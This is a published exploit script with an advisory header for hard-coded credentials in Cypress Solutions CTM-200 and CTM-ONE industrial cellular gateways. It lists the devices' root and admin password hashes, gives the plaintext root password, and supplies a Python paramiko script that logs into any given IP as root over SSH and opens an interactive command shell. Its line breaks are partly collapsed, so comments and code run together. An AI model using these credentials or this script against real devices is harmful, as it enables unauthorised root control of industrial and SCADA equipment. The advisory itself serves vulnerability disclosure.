# Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)# Date: 21.09.2021# Exploit Author: LiquidWorm# Vendor Homepage: https://www.cypress.bc.ca#!/usr/bin/env python3### Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)### Vendor: Cypress Solutions Inc.# Product web page: https://www.cypress.bc.ca# Affected version: CTM-ONE (1.3.6-latest)# CTM-ONE (1.3.1)# CTM-ONE (1.1.9)# CTM200 (2.7.1.5659-latest)# CTM200 (2.0.5.3356-184)## Summary: CTM-200 is the industrial cellular wireless gateway for fixed# and mobile applications. The CTM-200 is a Linux based platform powered# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard# features make the CTM-200 ideal for mobile fleet applications or fixed# site office and SCADA communications.## CTM-ONE is the industrial LTE cellular wireless gateway for mobile and# fixed applications. CTM-ONE is your next generation of gateway for fleet# tracking and fixed sites.## ======================================================================# CTM-200# /var/config/passwd:# -------------------# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash# nobody:*:65534:65534:nobody:/var:/bin/false# daemon:*:65534:65534:daemon:/var:/bin/false## /var/config/advanced.ini:# -------------------------# 0# 0# Chameleon# 0,0,0,0,0,255# 0,0,0,0,0,255# 0,0,0,0,0,255# 0,0,0,0,0,255# 0,0,0,0,0,255# 0,0,0,0,0,255### CTM-ONE# /etc/shadow:# ------------# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::# daemon:*:16009:0:99999:7:::# bin:*:16009:0:99999:7:::# sys:*:16009:0:99999:7:::# ftp:*:16009:0:99999:7:::# nobody:*:16009:0:99999:7:::# messagebus:!:16009:0:99999:7:::# ======================================================================# # Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials# within their Linux distribution image. This weakness can lead to the# exposure of resources or functionality to unintended actors, providing# attackers with sensitive information including executing arbitrary code.## Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)#GNU/Linux 2.6.32.25 (arm4tl)#lighttpd/1.4.39#BusyBox v1.24.1#BusyBox v1.15.3### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2021-5686# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php### 21.09.2021#import sys
import paramiko
bnr='''
o ┌─┐┌┬┐┌─┐┌─┐┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬┬ o
│ │││││ ┬├─┤├┬┘│ ││ │ │ └─┐├─┤├┤ ││
o └─┘┴ ┴└─┘┴ ┴┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o
'''print(bnr)iflen(sys.argv)<2:print('Put an IP.')
sys.exit()
adrs=sys.argv[1]##
unme='root'#admin#
pwrd='Chameleon'##
rsh=paramiko.SSHClient()
rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
rsh.connect(adrs,username=unme,password=pwrd)while1:
cmnd=input('# ')if cmnd=='exit':break
stdin,stdout,stderr=rsh.exec_command(cmnd)
stdin.close()print(str(stdout.read().decode()))
rsh.close()
